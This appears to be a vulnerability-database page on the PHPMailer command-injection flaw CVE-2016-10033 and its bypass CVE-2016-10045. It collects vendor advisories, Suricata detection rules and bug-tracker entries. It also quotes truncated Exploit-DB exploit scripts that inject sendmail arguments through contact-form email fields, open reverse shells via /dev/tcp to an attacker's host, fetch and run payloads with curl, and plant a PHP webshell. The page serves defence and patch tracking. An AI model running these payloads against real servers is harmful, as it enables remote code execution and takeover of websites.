CVE-2016-10033
published 2016-12-30CVE-2016-10033: The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and…
PriorityP197critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2025-07-28
Exploited in the wild
EPSS
99.71%
100.0th percentile
The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted Sender property.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | libphp-phpmailer | < libphp-phpmailer 5.2.14+dfsg-2.1 (bookworm) | libphp-phpmailer 5.2.14+dfsg-2.1 (bookworm) |
| debian | libphp-phpmailer | — | — |
| drupal | phpmailer_3rd_party_library | — | — |
| joomla | joomla_! | 1.5.0 – 3.6.5 | — |
| phpmailer | phpmailer | >= 5.0.0 < 5.2.18 | 5.2.18 |
| phpmailer | phpmailer | >= 5.0.0 < 5.2.20 | 5.2.20 |
| phpmailer_project | phpmailer | < 5.2.18 | 5.2.18 |
| phpmailer_project | phpmailer | < 5.2.20 | 5.2.20 |
| wordpress | wordpress | <= 4.7 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Fortinet IPS signature for CVE-2016-10033 PHPMailer RCE detection ↗
- →Fortinet IPS signature PHP.App.Email.Arguments.Parsing.Remote.Code.Execution also covers this vulnerability ↗
- →Detect crafted Sender/From email addresses containing backslash-doublequote sequences (e.g. \") used to inject extra sendmail arguments ↗
- →Monitor for unexpected new PHP files created in the web root directory following PHPMailer form submissions, as the attack writes a PHP webshell via sendmail log redirection ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
ghsa9.8CRITICAL
osv9.8CRITICAL
vulncheck9.8CRITICAL
cisa9.8CRITICAL
vendor_debian9.8CRITICAL
vendor_ubuntu9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
libphp-phpmailer vulnerability
osv·2023-03-15·CVSS 9.8
CVE-2017-11503 [CRITICAL] libphp-phpmailer vulnerability
libphp-phpmailer vulnerability
USN-5956-1 fixed vulnerabilities in PHPMailer. It was discovered that the
fix for CVE-2017-11503 was incomplete. This update fixes the problem.
Original advisory details:
Dawid Golunski discovered that PHPMailer was not properly escaping user
input data used as arguments to functions executed by the system shell. An
attacker could possibly use this issue to execute arbitrary code. This
issue only affected Ubuntu 16.04 ESM. (CVE-2016-10033, CVE-2016-10045)
It was discovered that PHPMailer was not properly escaping characters
in certain fields of the code_generator.php example code. An attacker
could possibly use this issue to conduct cross-site scripting (XSS)
attacks. This issue was only fixed in Ubuntu 16.04 ESM and Ubuntu 18.04
ESM. (CVE-2017-11503)
Yo
OSV
libphp-phpmailer vulnerabilities
osv·2023-03-15·CVSS 9.8
CVE-2016-10033 [CRITICAL] libphp-phpmailer vulnerabilities
libphp-phpmailer vulnerabilities
Dawid Golunski discovered that PHPMailer was not properly escaping user
input data used as arguments to functions executed by the system shell. An
attacker could possibly use this issue to execute arbitrary code. This
issue only affected Ubuntu 16.04 ESM. (CVE-2016-10033, CVE-2016-10045)
It was discovered that PHPMailer was not properly escaping characters
in certain fields of the code_generator.php example code. An attacker
could possibly use this issue to conduct cross-site scripting (XSS)
attacks. This issue was only fixed in Ubuntu 16.04 ESM and Ubuntu 18.04
ESM. (CVE-2017-11503)
Yongxiang Li discovered that PHPMailer was not properly converting
relative paths provided as user input when adding attachments to messages,
which could lead to relative im
OSV
Remote code execution in PHPMailer
osv·2020-03-05·CVSS 9.8
CVE-2016-10033 [CRITICAL] Remote code execution in PHPMailer
Remote code execution in PHPMailer
### Impact
The `mailSend` function in the default `isMail` transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted `Sender` property.
### Patches
Fixed in 5.2.18
### Workarounds
Filter and validate user input before passing it to internal functions.
### References
https://nvd.nist.gov/vuln/detail/CVE-2016-10033
Related to a follow-on issue in https://nvd.nist.gov/vuln/detail/CVE-2016-10045
### For more information
If you have any questions or comments about this advisory:
* Open a private issue in [the PHPMailer project](https://github.com/PHPMailer/PHPMailer)
OSV
Remote code execution in PHPMailer
osv·2020-03-05·CVSS 9.8
CVE-2016-10045 [CRITICAL] Remote code execution in PHPMailer
Remote code execution in PHPMailer
### Impact
The `isMail` transport in PHPMailer before 5.2.20 might allow remote attackers to pass extra parameters to the `mail` command and consequently execute arbitrary code by leveraging improper interaction between the `escapeshellarg` function and internal escaping performed in the mail function in PHP. NOTE: this vulnerability exists because of an incorrect fix for CVE-2016-10033.
This issue really emphasises that it's worth avoiding the built-in PHP `mail()` function entirely.
### Patches
Fixed in 5.2.20
### Workarounds
Send via SMTP to localhost instead of calling the `mail()` function.
### References
https://nvd.nist.gov/vuln/detail/CVE-2016-10045
See also https://nvd.nist.gov/vuln/detail/CVE-2016-10033
### For more information
If you have
GHSA
Remote code execution in PHPMailer
ghsa·2020-03-05·CVSS 9.8
CVE-2016-10033 [CRITICAL] CWE-77 Remote code execution in PHPMailer
Remote code execution in PHPMailer
### Impact
The `mailSend` function in the default `isMail` transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted `Sender` property.
### Patches
Fixed in 5.2.18
### Workarounds
Filter and validate user input before passing it to internal functions.
### References
https://nvd.nist.gov/vuln/detail/CVE-2016-10033
Related to a follow-on issue in https://nvd.nist.gov/vuln/detail/CVE-2016-10045
### For more information
If you have any questions or comments about this advisory:
* Open a private issue in [the PHPMailer project](https://github.com/PHPMailer/PHPMailer)
GHSA
Remote code execution in PHPMailer
ghsa·2020-03-05·CVSS 9.8
CVE-2016-10045 [CRITICAL] CWE-77 Remote code execution in PHPMailer
Remote code execution in PHPMailer
### Impact
The `isMail` transport in PHPMailer before 5.2.20 might allow remote attackers to pass extra parameters to the `mail` command and consequently execute arbitrary code by leveraging improper interaction between the `escapeshellarg` function and internal escaping performed in the mail function in PHP. NOTE: this vulnerability exists because of an incorrect fix for CVE-2016-10033.
This issue really emphasises that it's worth avoiding the built-in PHP `mail()` function entirely.
### Patches
Fixed in 5.2.20
### Workarounds
Send via SMTP to localhost instead of calling the `mail()` function.
### References
https://nvd.nist.gov/vuln/detail/CVE-2016-10045
See also https://nvd.nist.gov/vuln/detail/CVE-2016-10033
### For more information
If you have
OSV
CVE-2016-10045: The isMail transport in PHPMailer before 5
osv·2016-12-30·CVSS 9.8
CVE-2016-10045 [CRITICAL] CVE-2016-10045: The isMail transport in PHPMailer before 5
The isMail transport in PHPMailer before 5.2.20 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code by leveraging improper interaction between the escapeshellarg function and internal escaping performed in the mail function in PHP. NOTE: this vulnerability exists because of an incorrect fix for CVE-2016-10033.
OSV
CVE-2016-10033: The mailSend function in the isMail transport in PHPMailer before 5
osv·2016-12-30·CVSS 9.8
CVE-2016-10033 [CRITICAL] CVE-2016-10033: The mailSend function in the isMail transport in PHPMailer before 5
The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted Sender property.
VulnCheck
PHPMailer Command Injection Vulnerability
vulncheck·2016·CVSS 9.8
CVE-2016-10033 [CRITICAL] CWE-77 PHPMailer Command Injection Vulnerability
PHPMailer Command Injection Vulnerability
PHPMailer contains a command injection vulnerability because it fails to sanitize user-supplied input. Specifically, this issue affects the 'mail()' function of 'class.phpmailer.php' script. An attacker can exploit this issue to execute arbitrary code within the context of the application. Failed exploit attempts will result in a denial-of-service condition.
Affected: PHP PHPMailer
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://www.ic3.gov/Media/News/2022/220126.pdf; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://cyble.com/resources/
CISA
PHPMailer Command Injection Vulnerability
cisa·2025-07-07·CVSS 9.8
CVE-2016-10033 [CRITICAL] CWE-77 PHPMailer Command Injection Vulnerability
Vulnerability: PHPMailer Command Injection Vulnerability
Affected: PHP PHPMailer
PHPMailer contains a command injection vulnerability because it fails to sanitize user-supplied input. Specifically, this issue affects the 'mail()' function of 'class.phpmailer.php' script. An attacker can exploit this issue to execute arbitrary code within the context of the application. Failed exploit attempts will result in a denial-of-service condition.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: This vulnerability could affect an open-source component, third-party library, protocol, or proprietary implementation that could be used by different products. For
Ubuntu
PHPMailer vulnerabilities
vendor_ubuntu·2023-03-15·CVSS 9.8
CVE-2021-3603 [CRITICAL] PHPMailer vulnerabilities
Title: PHPMailer vulnerabilities
Summary: Several security issues were fixed in PHPMailer.
Dawid Golunski discovered that PHPMailer was not properly escaping user
input data used as arguments to functions executed by the system shell. An
attacker could possibly use this issue to execute arbitrary code. This
issue only affected Ubuntu 16.04 ESM. (CVE-2016-10033, CVE-2016-10045)
It was discovered that PHPMailer was not properly escaping characters
in certain fields of the code_generator.php example code. An attacker
could possibly use this issue to conduct cross-site scripting (XSS)
attacks. This issue was only fixed in Ubuntu 16.04 ESM and Ubuntu 18.04
ESM. (CVE-2017-11503)
Yongxiang Li discovered that PHPMailer was not properly converting
relative paths provided as user input when addi
Ubuntu
PHPMailer vulnerability
vendor_ubuntu·2023-03-15·CVSS 9.8
CVE-2017-11503 [CRITICAL] PHPMailer vulnerability
Title: PHPMailer vulnerability
Summary: An incomplete fix was discovered in PHPMailer.
USN-5956-1 fixed vulnerabilities in PHPMailer. It was discovered that the
fix for CVE-2017-11503 was incomplete. This update fixes the problem.
Original advisory details:
Dawid Golunski discovered that PHPMailer was not properly escaping user
input data used as arguments to functions executed by the system shell. An
attacker could possibly use this issue to execute arbitrary code. This
issue only affected Ubuntu 16.04 ESM. (CVE-2016-10033, CVE-2016-10045)
It was discovered that PHPMailer was not properly escaping characters
in certain fields of the code_generator.php example code. An attacker
could possibly use this issue to conduct cross-site scripting (XSS)
attacks. This issue was only fixed in Ub
Drupal
PHPmailer 3rd party library - PSA-2016-004
vendor_drupal·2016-12-26·CVSS 9.8
CVE-2016-10033 [CRITICAL] PHPmailer 3rd party library - PSA-2016-004
Title: PHPmailer 3rd party library - PSA-2016-004
Vulnerability Type: PHPmailer 3rd party library
Description: Advisory ID: DRUPAL-SA-PSA-2016-004 Project: PHPMailer (third-party library) Version: 7.x, 8.x Date: 2016-December-26 Security risk: 23/25 ( Highly Critical ) AC:None/A:User/CI:All/II:All/E:Exploit/TD:All Vulnerability: Arbitrary PHP code execution Description The PHPMailer and SMTP modules (and maybe others) add support for sending e-mails using the 3rd party PHPMailer library. In general the Drupal project does not create advisories for 3rd party libraries. Drupal site maintainers should pay attention to the notifications provided by those 3rd party libraries as outlined in PSA-2011-002 - External libraries and plugins . However, given the extreme criticality of this issue and
Debian
CVE-2016-10045: libphp-phpmailer - The isMail transport in PHPMailer before 5.2.20 might allow remote attackers to ...
vendor_debian·2016·CVSS 9.8
CVE-2016-10045 [CRITICAL] CVE-2016-10045: libphp-phpmailer - The isMail transport in PHPMailer before 5.2.20 might allow remote attackers to ...
The isMail transport in PHPMailer before 5.2.20 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code by leveraging improper interaction between the escapeshellarg function and internal escaping performed in the mail function in PHP. NOTE: this vulnerability exists because of an incorrect fix for CVE-2016-10033.
Scope: local
bookworm: resolved
bullseye: resolved
forky: resolved
sid: resolved
trixie: resolved
Debian
CVE-2016-10033: libphp-phpmailer - The mailSend function in the isMail transport in PHPMailer before 5.2.18 might a...
vendor_debian·2016·CVSS 9.8
CVE-2016-10033 [CRITICAL] CVE-2016-10033: libphp-phpmailer - The mailSend function in the isMail transport in PHPMailer before 5.2.18 might a...
The mailSend function in the isMail transport in PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a \" (backslash double quote) in a crafted Sender property.
Scope: local
bookworm: resolved (fixed in 5.2.14+dfsg-2.1)
bullseye: resolved (fixed in 5.2.14+dfsg-2.1)
forky: resolved (fixed in 5.2.14+dfsg-2.1)
sid: resolved (fixed in 5.2.14+dfsg-2.1)
trixie: resolved (fixed in 5.2.14+dfsg-2.1)
Suricata
ET WEB_SPECIFIC_APPS Wordpress Host Header Injection (CVE-2016-10033) M3
suricata·2017-05-05·CVSS 9.8
CVE-2016-10033 [CRITICAL] ET WEB_SPECIFIC_APPS Wordpress Host Header Injection (CVE-2016-10033) M3
ET WEB_SPECIFIC_APPS Wordpress Host Header Injection (CVE-2016-10033) M3
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Wordpress Host Header Injection (CVE-2016-10033) M3"; flow:established,to_server; http.header; content:"substr{"; nocase; fast_pattern; http.host; pcre:"/^[^\r\n]+?[\x28\x29\x27\x22\x7b\x7d]/"; reference:url,exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html; classtype:web-application-attack; sid:2024279; rev:5; metadata:affected_product Wordpress, attack_target Web_Server, created_at 2017_05_05, cve CVE_2016_10033, deployment Perimeter, signature_severity Major, updated_at 2024_03_25;)
Suricata
ET WEB_SPECIFIC_APPS Wordpress Host Header Injection (CVE-2016-10033) M2
suricata·2017-05-05·CVSS 9.8
CVE-2016-10033 [CRITICAL] ET WEB_SPECIFIC_APPS Wordpress Host Header Injection (CVE-2016-10033) M2
ET WEB_SPECIFIC_APPS Wordpress Host Header Injection (CVE-2016-10033) M2
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Wordpress Host Header Injection (CVE-2016-10033) M2"; flow:established,to_server; http.uri; content:"action=lostpassword"; nocase; fast_pattern; http.host; pcre:"/^[^\r\n]+?[\x28\x29\x27\x22\x7b\x7d]/"; reference:url,exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html; classtype:web-application-attack; sid:2024278; rev:5; metadata:affected_product Wordpress, attack_target Web_Server, created_at 2017_05_05, cve CVE_2016_10033, deployment Perimeter, signature_severity Major, updated_at 2024_03_25;)
Suricata
ET EXPLOIT Possible CVE-2016-10033 PHPMailer RCE Attempt
suricata·2016-12-27·CVSS 9.8
CVE-2016-10033 [CRITICAL] ET EXPLOIT Possible CVE-2016-10033 PHPMailer RCE Attempt
ET EXPLOIT Possible CVE-2016-10033 PHPMailer RCE Attempt
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET EXPLOIT Possible CVE-2016-10033 PHPMailer RCE Attempt"; flow:established,to_server; http.method; content:"POST"; http.request_body; content:"<?php"; fast_pattern; content:"|5c 22 20|"; content:"-X"; content:".php"; content:"@"; http.content_type; content:"multipart/form-data|3b|"; startswith; reference:url,legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html; reference:url,github.com/opsxcq/exploit-CVE-2016-10033; classtype:attempted-user; sid:2023686; rev:4; metadata:affected_product PHPMailer, attack_target Web_Server, created_at 2016_12_27, cve CVE_2016_10033, deployment Datacenter, performance_impact Low, confidence Medium, signat
Exploit-DB
PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution
exploitdb·2017-06-21·CVSS 9.8
CVE-2016-10074 [CRITICAL] PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution
PHPMailer 2):
print "No such target. Exiting\n"
exit(3)
################################
# Payload
################################
cmd = "/bin/bash -c '0/dev/tcp/%s/%s;nohup sh &196 2>&196 &'" % (args.ATTACKER_IP, args.ATTACKER_PORT)
prepared_cmd = prepare_cmd(cmd)
payload = '"a\\" -be ' + prepared_cmd + ' "@a.co'
# Update payloads for PHPMailer bypass (PHPMailer < 5.2.20)
if target == 2:
payload = "\"a\\' -be " + prepared_cmd + " \"@a.co"
################################
# Attack episode
# This step will execute the reverse shell
################################
# Form fields
post_fields = {'action': "%s" % args.POST_ACTION, "%s" % args.POST_NAME: 'Jas Fasola', "%s" % args.POST_EMAIL: payload, "%s" % args.POST_MSG: 'Really important message'}
# Print relevant information
print "\n[
Exploit-DB
WordPress Plugin PHPMailer 4.6 - Host Header Command Injection (Metasploit)
exploitdb·2017-05-17·CVSS 9.8
CVE-2016-10033 [CRITICAL] WordPress Plugin PHPMailer 4.6 - Host Header Command Injection (Metasploit)
WordPress Plugin PHPMailer 4.6 - Host Header Command Injection (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'WordPress PHPMailer Host Header Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability in WordPress
version 4.6 with Exim as an MTA via a spoofed Host header to PHPMailer,
a mail-sending library that is bundled with WordPress.
A valid WordPress username is required to exploit the vulnerability.
Additionally, due to the altered Host header, exploitation is limited to
the default virtual host, assuming the header isn't mangled in transit.
If the target is running Apache 2.2.32 or 2.4.24 and later, the server
m
Exploit-DB
Vanilla Forums < 2.3 - Remote Code Execution
exploitdb·2017-05-11·CVSS 9.8
CVE-2016-10073 [CRITICAL] Vanilla Forums < 2.3 - Remote Code Execution
Vanilla Forums /dev/tcp/$rev_host/1337 0&1) &"
echo "$RCE_exec_cmd" > rce.txt
python -mSimpleHTTPServer 80 2>/dev/null >&2 &
hpid=$!
# POST data string
data='hpt=&Target=discussions&Email=admin&Request+a+new+password=Request+a+new+password&DeliveryType=VIEW&DeliveryMethod=JSON'
# Save payload on the target in /tmp/rce
cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt"
prep_host_header "$cmd"
curl -H"Host: $host_header" -0 -s -i -d "$data" $target/entry/passwordrequest | grep -q "200 OK"
if [ $? -ne 0 ]; then
echo "[!] Failed conecting to the target URL. Exiting"
exit 2
fi
echo -e "\e[92m[+]\033[0m Connected to the target"
echo -e "\n\e[92m[+]\e[0m Payload sent successfully"
sleep 2s
# Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce
cmd="/usr/bin/nohup /bin/bash /tmp/rce"
p
Exploit-DB
WordPress Core 4.6 - Remote Code Execution
exploitdb·2017-05-03·CVSS 9.8
CVE-2016-10033 [CRITICAL] WordPress Core 4.6 - Remote Code Execution
WordPress Core 4.6 - Remote Code Execution
---
#!/bin/bash
#
# __ __ __ __ __
# / / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________
# / / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
# / /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,/dev/tcp/$rev_host/1337 0&1) &"
echo "$RCE_exec_cmd" > rce.txt
python -mSimpleHTTPServer 80 2>/dev/null >&2 &
hpid=$!
# Save payload on the target in /tmp/rce
cmd="/usr/bin/curl -o/tmp/rce $rev_host/rce.txt"
prep_host_header "$cmd"
curl -H"Host: $host_header" -s -d 'user_login=admin&wp-submit=Get+New+Password' $target/wp-login.php?action=lostpassword
echo -e "\n\e[92m[+]\e[0m Payload sent successfully"
# Execute payload (RCE_exec_cmd) on the target /bin/bash /tmp/rce
cmd="/bin/bash /tmp/rce"
prep_host_header "$cmd"
curl -H"Host: $host_h
Exploit-DB
PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - 'AIO' 'PwnScriptum' Remote Code Execution
exploitdb·2017-01-02·CVSS 9.8
CVE-2016-10074 [CRITICAL] PHPMailer < 5.2.20 / SwiftMailer < 5.4.5-DEV / Zend Framework / zend-mail < 2.4.11 - 'AIO' 'PwnScriptum' Remote Code Execution
PHPMailer 4):
print "No such target. Exiting\n"
exit(3)
if target == 1:
# PHPMailer "
RCE_PHP_CODE = """/dev/tcp/%s/%s 0&1' "); ?>""" % (TMOUT, args.ATTACKERS_IP, args.ATTACKERS_PORT)
# The form names might need to be adjusted
post_fields = {'action': "%s" % args.POST_ACTION, "%s" % args.POST_NAME: 'Jas Fasola', "%s" % args.POST_EMAIL: payload, "%s" % args.POST_MSG: RCE_PHP_CODE}
# Attack
# Inject payload into PHPMailer / mail() via a Contact form. This should write out the backdoor
print "[+] Backdoor upload via the contact form at '%s'\n" % CONTACT_SCRIPT_URL
data = urllib.urlencode(post_fields)
req = urllib2.Request(CONTACT_SCRIPT_URL, data)
response = urllib2.urlopen(req)
the_page = response.read()
# Check if the backdoor was uploaded correctly.
# A little trick here. The urlopen s
Exploit-DB
PHPMailer < 5.2.18 - Remote Code Execution
exploitdb·2016-12-29·CVSS 9.8
CVE-2016-10033 [CRITICAL] PHPMailer < 5.2.18 - Remote Code Execution
PHPMailer
3 - Open other terminal and run the exploit: python3 anarcoder.py
Video PoC: https://www.youtube.com/watch?v=DXeZxKr-qsU
Full Advisory:
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
"""
from requests_toolbelt import MultipartEncoder
import requests
import os
import base64
from lxml import html as lh
os.system('clear')
print("\n")
print(" █████╗ ███╗ ██╗ █████╗ ██████╗ ██████╗ ██████╗ ██████╗ ███████╗██████╗ ")
print("██╔══██╗████╗ ██║██╔══██╗██╔══██╗██╔════╝██╔═══██╗██╔══██╗██╔════╝██╔══██╗")
print("███████║██╔██╗ ██║███████║██████╔╝██║ ██║ ██║██║ ██║█████╗ ██████╔╝")
print("██╔══██║██║╚██╗██║██╔══██║██╔══██╗██║ ██║ ██║██║ ██║██╔══╝ ██╔══██╗")
print("██║ ██║██║ ╚████║██║ ██║██║ ██║╚██████╗╚██████╔╝██████╔╝███████╗██║ ██║")
pri
Exploit-DB
PHPMailer < 5.2.20 - Remote Code Execution
exploitdb·2016-12-27·CVSS 9.8
CVE-2016-10045 [CRITICAL] PHPMailer < 5.2.20 - Remote Code Execution
PHPMailer "
post_fields = {'action': 'send', 'name': 'Jas Fasola', 'email': payload, 'msg': RCE_PHP_CODE}
# Attack
data = urllib.urlencode(post_fields)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
the_page = response.read()
Exploit-DB
PHPMailer < 5.2.19 - Sendmail Argument Injection (Metasploit)
exploitdb·2016-12-26·CVSS 9.8
CVE-2016-1004 [CRITICAL] PHPMailer < 5.2.19 - Sendmail Argument Injection (Metasploit)
PHPMailer 'PHPMailer Sendmail Argument Injection',
'Description' => %q{
PHPMailer versions up to and including 5.2.19 are affected by a
vulnerability which can be leveraged by an attacker to write a file with
partially controlled contents to an arbitrary location through injection
of arguments that are passed to the sendmail binary. This module
writes a payload to the web root of the webserver before then executing
it with an HTTP request. The user running PHPMailer must have write
access to the specified WEB_ROOT directory and successful exploitation
can take a few minutes.
},
'Author' => [
'Dawid Golunski', # vulnerability discovery and original PoC
'Spencer McIntyre' # metasploit module
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2016-10033'],
['CVE', '2016-10045'],
['EDB',
Exploit-DB
PHPMailer < 5.2.18 - Remote Code Execution
exploitdb·2016-12-26·CVSS 9.8
CVE-2016-10033 [CRITICAL] PHPMailer < 5.2.18 - Remote Code Execution
PHPMailer \r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="email"\r\n\r\nvulnerables@ -OQueueDirectory=/tmp -X/www/backdoor.php\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe\r\nContent-Disposition: form-data; name="message"\r\n\r\nPwned\r\n------WebKitFormBoundaryzXJpHSq4mNy35tHe--\r\n' >/dev/null && echo '[+] Target exploited, acessing shell at http://'$host'/backdoor.php'
cmd='whoami'
while [ "$cmd" != 'exit' ]
do
echo '[+] Running '$cmd
curl -sq http://$host/backdoor.php?cmd=$(echo -ne $cmd | base64) | grep '|' | head -n 1 | cut -d '|' -f 2 | base64 -d
echo
read -p 'RemoteShell> ' cmd
done
echo '[+] Exiting'
Exploit-DB
PHPMailer < 5.2.18 - Remote Code Execution
exploitdb·2016-12-25·CVSS 9.8
CVE-2016-10033 [CRITICAL] PHPMailer < 5.2.18 - Remote Code Execution
PHPMailer
09607 ";
// ------------------
// mail() param injection via the vulnerability in PHPMailer
require_once('class.phpmailer.php');
$mail = new PHPMailer(); // defaults to using php "mail()"
$mail->SetFrom($email_from, 'Client Name');
$address = "[email protected]";
$mail->AddAddress($address, "Some User");
$mail->Subject = "PHPMailer PoC Exploit CVE-2016-10033";
$mail->MsgHTML($msg_body);
if(!$mail->Send()) {
echo "Mailer Error: " . $mail->ErrorInfo;
} else {
echo "Message sent!\n";
}
?>
Nuclei
WordPress PHPMailer < 5.2.18 - Remote Code Execution
nuclei·CVSS 9.8
CVE-2016-10033 [CRITICAL] WordPress PHPMailer < 5.2.18 - Remote Code Execution
WordPress PHPMailer ([A-Za-z0-9]+)'
internal: true
part: body
# digest: 490a00463044022008b31c07add92ccfdd42714769c7777a3905388c545558ee34daf90307912cfa02207ff6779e8c5b71723749541f3dbf606f6b6d64b79b2253dd4a8682e509e4550f:922c64590222798bb761d5b6d8e72950
Metasploit
WordPress PHPMailer Host Header Command Injection
metasploit
WordPress PHPMailer Host Header Command Injection
WordPress PHPMailer Host Header Command Injection
This module exploits a command injection vulnerability in WordPress version 4.6 with Exim as an MTA via a spoofed Host header to PHPMailer, a mail-sending library that is bundled with WordPress. A valid WordPress username is required to exploit the vulnerability. Additionally, due to the altered Host header, exploitation is limited to the default virtual host, assuming the header isn't mangled in transit. If the target is running Apache 2.2.32 or 2.4.24 and later, the server may have HttpProtocolOptions set to Strict, preventing a Host header containing parens from passing through, making exploitation unlikely.
Metasploit
PHPMailer Sendmail Argument Injection
metasploit
PHPMailer Sendmail Argument Injection
PHPMailer Sendmail Argument Injection
PHPMailer versions up to and including 5.2.19 are affected by a vulnerability which can be leveraged by an attacker to write a file with partially controlled contents to an arbitrary location through injection of arguments that are passed to the sendmail binary. This module writes a payload to the web root of the webserver before then executing it with an HTTP request. The user running PHPMailer must have write access to the specified WEB_ROOT directory and successful exploitation can take a few minutes.
HackerOne
RCE by command line argument injection to `gm convert` in `/edit/process?a=crop`
hackerone·2017-04-26·CVSS 9.8
[CRITICAL] RCE by command line argument injection to `gm convert` in `/edit/process?a=crop`
RCE by command line argument injection to `gm convert` in `/edit/process?a=crop`
### Summary
The `y` parameter of `/edit/process` endpoint (with `a=crop`) is vulnerable to command-line argument injection to something that appears to be GraphicsMagick utility (probably `gm convert`). Due to GraphicsMagick's hacker-friendly processing of `|`-starting filenames supplied to `-write` option, it leads to command execution.
### Reproduction steps
0. Enable Burp Proxy or similar software that allows you to log and edit HTTP requests.
1. Login into your imgur account and upload an image.
2. Move your mouse over the image, click on the tiny button with pencil on it, then click "Edit".
3. Select a random rectangle on the image, then click "Apply".
4. In the burp suite, you will see a request to a
Bugzilla
CVE-2016-10045 phpmailer: Parameter injection via mail() function
bugzilla·2017-01-11·CVSS 9.8
CVE-2016-10045 [CRITICAL] CVE-2016-10045 phpmailer: Parameter injection via mail() function
CVE-2016-10045 phpmailer: Parameter injection via mail() function
The isMail transport in PHPMailer before 5.2.20, when the Sender property is not set, might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code by leveraging improper interaction between the escapeshellarg function and internal escaping performed in the mail function. NOTE: this vulnerability exists because of an incorrect fix for CVE-2016-10033.
References:
http://seclists.org/oss-sec/2016/q4/771
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10045-Vuln-Patch-Bypass.html
Bugzilla
CVE-2016-10033 mantis: phpmailer: Parameter injection via mail() function [epel-5]
bugzilla·2017-01-02·CVSS 9.8
CVE-2016-10033 [CRITICAL] CVE-2016-10033 mantis: phpmailer: Parameter injection via mail() function [epel-5]
CVE-2016-10033 mantis: phpmailer: Parameter injection via mail() function [epel-5]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora EPEL.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When submitting as an update, use the fedpkg template provided in the next
comment(s). This will include the bug IDs of this tracking bug as well as
the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
fedpkg commit message.
[bug automatically created by: add-tracking-bu
Bugzilla
CVE-2016-10033 phpmailer: Parameter injection via mail() function
bugzilla·2017-01-02·CVSS 9.8
CVE-2016-10033 [CRITICAL] CVE-2016-10033 phpmailer: Parameter injection via mail() function
CVE-2016-10033 phpmailer: Parameter injection via mail() function
A vulnerability was found in PHPMailer. This code is being used in multiple web applications. A remote code execution could be achieved by passing a maliciously crafted expression to the vulnerable application.
References:
http://seclists.org/oss-sec/2016/q4/750
https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
Discussion:
Created drupal7 tracking bugs for this issue:
Affects: fedora-all [bug 1409494]
Affects: fedora-all [bug 1409495]
Affects: epel-all [bug 1409496]
---
Created wordpress tracking bugs for this issue:
Affects: fedora-all [bug 1409497]
Affects: epel-all [bug 1409498]
---
Created mantis tracking bugs for this issue:
Affects: fedora-all [bug 1409492]
Affe
Bugzilla
CVE-2016-10033 wordpress: phpmailer: Parameter injection via mail() function [epel-all]
